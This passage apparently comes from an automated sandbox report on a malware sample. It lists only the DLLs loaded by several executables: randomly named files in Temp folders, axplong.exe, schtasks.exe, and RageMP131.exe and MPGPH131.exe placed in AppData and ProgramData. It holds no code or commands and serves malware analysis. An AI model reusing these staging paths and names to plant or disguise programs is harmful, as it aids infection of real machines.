Source: C:\Users\user\1000015002\b6042db502.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\1000015002\b6042db502.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\1000015002\b6042db502.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\1000015002\b6042db502.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\1000015002\b6042db502.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\1000015002\b6042db502.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\1000015002\b6042db502.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\1000015002\b6042db502.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\1000015002\b6042db502.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\1000015002\b6042db502.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\1000015002\b6042db502.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\1000015002\b6042db502.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\1000015002\b6042db502.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\1000015002\b6042db502.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\1000015002\b6042db502.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\1000015002\b6042db502.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\1000015002\b6042db502.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\1000015002\b6042db502.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\1000015002\b6042db502.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\1000015002\b6042db502.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\1000015002\b6042db502.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\1000015002\b6042db502.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\1000015002\b6042db502.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\1000015002\b6042db502.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\1000015002\b6042db502.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\1000015002\b6042db502.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\1000015002\b6042db502.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\1000015002\b6042db502.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\1000015002\b6042db502.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\1000015002\b6042db502.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\1000015002\b6042db502.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\1000015002\b6042db502.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\1000015002\b6042db502.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\1000015002\b6042db502.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\1000015002\b6042db502.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\1000015002\b6042db502.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: d3d10warp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: dxcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: apphelp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: winmm.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: rstrtmgr.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: ncrypt.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: ntasn1.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: d3d11.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: dxgi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: resourcepolicyclient.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: kernel.appcore.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: d3d10warp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: uxtheme.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: dxcore.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: sspicli.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: winhttp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: wininet.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: mswsock.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: devobj.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: webio.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: iphlpapi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: winnsi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: dnsapi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: rasadhlp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: fwpuclnt.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: schannel.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: mskeyprotect.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: ncryptsslp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: msasn1.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: cryptsp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: rsaenh.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: cryptbase.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: gpapi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: winmm.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: rstrtmgr.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: ncrypt.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: ntasn1.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: d3d11.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: dxgi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: resourcepolicyclient.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: kernel.appcore.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: d3d10warp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: uxtheme.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: dxcore.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: sspicli.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: winhttp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: wininet.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: mswsock.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: devobj.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: webio.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: iphlpapi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: winnsi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: dnsapi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: rasadhlp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: fwpuclnt.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: schannel.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: mskeyprotect.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: ncryptsslp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: msasn1.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: cryptsp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: rsaenh.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: cryptbase.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: d3d11.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: dxcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: devobj.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: d3d11.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: dxcore.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: devobj.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: d3d11.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: dxcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: devobj.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: d3d11.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: dxcore.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: devobj.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: dnsapi.dll
